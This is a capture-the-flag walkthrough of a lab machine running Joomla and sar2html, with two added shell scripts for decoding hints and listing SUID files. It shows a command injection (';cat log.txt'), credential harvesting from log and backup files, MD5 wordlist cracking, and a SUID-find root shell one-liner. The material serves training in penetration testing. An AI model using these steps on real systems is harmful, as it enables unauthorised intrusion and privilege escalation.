Let's decode the value written in the FTP file with ROT13 (a fixed substitution, so the same operation both encodes and decodes). The result is "nothing".
We are asked whether the service on port 10000 can be exploited. Let's try. The answer is "nay".
Let's get back to the dirb results and go through the files found on the web service, starting with robots.txt.
At the bottom of robots.txt we see a string of decimal ASCII codes.
We decode it in the order ASCII → Base64 → MD5: the ASCII codes decode to a Base64 string, the Base64 decodes to an MD5 hash, and the hash is not reversible, so we look it up against a wordlist instead.
The string we get is: kidding.
The other files listed in robots.txt contain nothing of interest.
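As an added example (this is not code from the original writeup), the shell below reproduces both decodings used so far: ROT13 for the FTP hint, and the chain decimal ASCII codes → Base64 → MD5 hash → wordlist lookup for the robots.txt string. The sample input is constructed inside the script from the word "hello", and the four-word wordlist standing in for rockyou.txt is an assumption; the real robots.txt string and the value "kidding" are not reproduced here.

```sh
#!/bin/sh
# Added example: the two decodings used in the writeup, run on constructed input.
# Assumptions: the tiny WORDLIST and the SAMPLE built from the word "hello".

# ROT13 is a fixed substitution, so the same tr call encodes and decodes.
rot13() {
    printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Space-separated decimal ASCII codes -> text (printf expands the octal escape).
from_decimal() {
    for n in $1; do
        printf "\\$(printf '%03o' "$n")"
    done
}

# Text (on stdin) -> decimal codes; only used to construct the sample below.
to_decimal() {
    od -An -tu1 -v | tr -s ' \n' ' ' | sed 's/^ //; s/ $//'
}

# MD5 is a hash, not a cipher: the only way back is to hash candidate words
# and compare.  Constructed wordlist, standing in for rockyou.txt.
WORDLIST="admin password hello letmein"
crack_md5() {
    for w in $WORDLIST; do
        if [ "$(printf '%s' "$w" | md5sum | cut -d' ' -f1)" = "$1" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done
    return 1
}

# The full chain from the writeup: ASCII codes -> Base64 -> MD5 hash -> word.
decode_chain() {
    b64=$(from_decimal "$1")
    hash=$(printf '%s' "$b64" | base64 -d)
    crack_md5 "$hash"
}

# Constructed sample: encode "hello" forwards so the chain has something to undo.
SAMPLE=$(printf '%s' hello | md5sum | cut -d' ' -f1 | tr -d '\n' | base64 | tr -d '\n' | to_decimal)

echo "rot13(uryyb) = $(rot13 uryyb)"
echo "sample codes: $SAMPLE"
echo "decoded word: $(decode_chain "$SAMPLE")"
```

To use it on the real string, paste the decimal codes from robots.txt into decode_chain and point WORDLIST at a proper dictionary; crack_md5 returns non-zero when nothing in the list matches.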
The next question asks which CMS is running.
Going back to the files in the dirb results, the answer is Joomla.
Let's enumerate the Joomla files.
Going through them one by one, we see that /_test is the only page that is useful to us.
A quick Google search for sar2html, the application behind /_test, shows that there is a public command-injection exploit for it.
The exploit description tells us how to use it: a shell command appended to the URL parameter is executed by the server.
The output of the command we inject into the URL appears below.
;cat log.txt
log.txt contains SSH login details.
When we try the port mentioned in log.txt, we see that it is closed.
SSH did not appear in the initial Nmap scan, which only covers the top 1000 ports, so we scan all 65535 ports again with "-p-".
SSH is listening on port 55007.
Let's log in.
Looking around the files, we see backup.sh.
Reading it with "cat", the line USER=stoner draws our attention, and the password is on the bottom line.
Switching to the stoner user, we can obtain user.txt.
Running "sudo -l" only gives us "/NotThisTime/MessinWithYa"..., a dead end, so we look elsewhere for privilege escalation.
Now it is time to use find to search for files that have the SUID bit set.
SUID (Set owner User ID upon execution) is a special file permission. Normally on Linux/Unix a program runs with the access permissions of the user who launched it. With SUID set, the program runs with the permissions of the file's owner rather than those of the user who runs it, which is why a SUID binary owned by root is exactly what we are looking for.
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
In the list there is the find command with the SUID bit set, which means find runs as root, and anything we pass to its -exec flag (as shown above with ls -ld) runs as root too. Let's try it out by changing the permissions of the root directory.
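As an added example (not part of the original writeup), the shell below recreates the SUID check on a constructed temporary directory: it creates one file with the SUID bit and one without, lists SUID files with the same find predicate used above, and flags the names that appear on an illustrative shortlist of programs known to hand over root access when they run SUID. The shortlist and the demo directory are assumptions; the general -exec shell trick is only shown in a comment and must be run by hand against the real target.

```sh
#!/bin/sh
# Added example: enumerate SUID files under a root and flag the ones that are
# trivially abusable.  Assumptions: the shortlist below and the constructed
# temp tree used for the demo.

# Same predicate as the find command in the writeup: any regular file with
# the SUID bit; errors from unreadable directories are discarded.
suid_files() {
    find "$1" -perm /4000 -type f 2>/dev/null
}

# Illustrative shortlist of programs that give a root shell, or arbitrary file
# read/write, when SUID root.  find is on it because -exec runs any command
# as the file owner.
KNOWN_ABUSABLE="find vim nmap bash python perl less more cp mv env"

# Print the SUID files whose basename is on the shortlist.
abusable_suid() {
    suid_files "$1" | while IFS= read -r f; do
        name=$(basename "$f")
        case " $KNOWN_ABUSABLE " in
            *" $name "*) printf '%s\n' "$f" ;;
        esac
    done
}

# Constructed demo tree: a fake "find" with the SUID bit and a plain file.
DEMO_ROOT=$(mktemp -d)
trap 'rm -rf "$DEMO_ROOT"' EXIT
: > "$DEMO_ROOT/find"
: > "$DEMO_ROOT/plain"
chmod 4755 "$DEMO_ROOT/find"
chmod 755  "$DEMO_ROOT/plain"

echo "SUID files under $DEMO_ROOT:"
suid_files "$DEMO_ROOT"
echo "Worth a closer look:"
abusable_suid "$DEMO_ROOT"

# On the real box run:  suid_files /  and  abusable_suid /
# Once a SUID-root find is confirmed, the usual way to cash it in is to let
# -exec spawn a shell that keeps the effective uid (bash needs -p for that):
#   find . -exec /bin/sh -p \; -quit
```

Running abusable_suid against / on the target reproduces the writeup's observation in one line: find shows up because its owner is root and the SUID bit is set, so every -exec it performs is done as root.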